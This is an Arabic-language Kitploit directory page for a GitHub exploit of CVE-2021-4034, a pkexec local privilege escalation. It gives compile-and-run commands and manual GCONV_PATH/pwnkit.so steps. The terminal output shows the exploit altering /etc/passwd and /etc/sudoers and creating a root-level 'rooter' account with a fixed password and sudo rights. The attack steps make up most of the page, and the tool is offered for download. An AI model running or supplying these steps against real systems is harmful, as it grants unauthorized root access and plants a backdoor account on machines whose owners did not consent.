Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-4034 — استغلال لثغرة CVE-2021-4034 (pkexec) يضيف مستخدمًا بصلاحيات الجذر مع امتيازات sudo. يتضمن خطوات استغلال يدوية ويقوم بتجميع pwnkit.so لتصعيد الامتيازات محليًا. | Kitploit
أدوات/GitHubGitHub/rvn0xsy/cve-2021-4034
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلال
GitHubrvn0xsy/cve-2021-4034

CVE-2021-4034

استغلال لثغرة CVE-2021-4034 (pkexec) يضيف مستخدمًا بصلاحيات الجذر مع امتيازات sudo. يتضمن خطوات استغلال يدوية ويقوم بتجميع pwnkit.so لتصعيد الامتيازات محليًا.

عرض المستودع
97165منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-4034

CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation

تم تعزيزه بناءً على CVE-2021-4034، حيث سيؤدي تنفيذ Exploit إلى إضافة اسم المستخدم rooter وكلمة المرور Hello@World افتراضيًا، وسيتمتع مستخدم rooter بصلاحيات sudo.

Refer to CVE-2021-4034, executing Exploit will add username rooter, password Hello@World by default, and The rooter user will have sudo privileges.

Usage

root@kitploit:~

test@some:~$ gcc cve-2021-4034.c -o ./exp
test@some:~$ ./exp
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!

[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!

[+]Add Root User Success...
test@some:~$ su rooter
Password:
root@some:/home/test# id
uid=0(root) gid=0(root) groups=0(root)
root@some:/home/test#

رفع الصلاحيات يدويًا

إذا كانت البيئة الهدف لا تحتوي على gcc، يمكن تنفيذ الأوامر يدويًا وتجميع pwnkit.so محليًا.

إنشاء بيئة الاستغلال - الجهاز الهدف

root@kitploit:~
$ mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'
$ mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules

تجميع pwnkit.so و pkexec - محليًا

root@kitploit:~
$ mkdir pwnkit
$ gcc pwnkit.so.c -o pwnkit/pwnkit.so -lcrypt -shared -fPIC
$ gcc pkexec.c -o pkexec

تنفيذ Exploit

  1. ارفع مجلد pwnkit إلى الجهاز الهدف
  2. ارفع pkexec إلى الجهاز الهدف
  3. نفّذ pkexec
root@kitploit:~
$ ./pkexec
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!

[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!

[+]Add Root User Success...
تنزيل الأداة